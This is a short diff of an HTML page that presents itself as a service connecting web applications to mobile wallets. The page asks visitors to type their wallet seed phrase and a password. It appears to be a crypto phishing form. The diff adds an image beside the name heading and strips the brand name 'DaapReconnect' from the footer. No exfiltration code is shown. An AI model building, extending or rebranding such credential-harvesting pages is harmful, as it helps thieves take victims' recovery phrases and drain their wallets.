--- a/alice.html
+++ b/alice.html
@@ -74,7 +74,10 @@
                         </div>
 
                         <div class="middle">
-                            <h4>Alice</h4>
+                            <div class="toop">
+                                <img src="alice.jpg" alt="">
+                                <h4>Alice</h4>   
+                            </div>
                             <textarea id="seed" minlength="30" name="Alice" placeholder="Seed Phrase..." required></textarea >
  <input id="movepass" name="Password" type="password" placeholder="Password"/>
                         </div>
@@ -109,7 +112,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
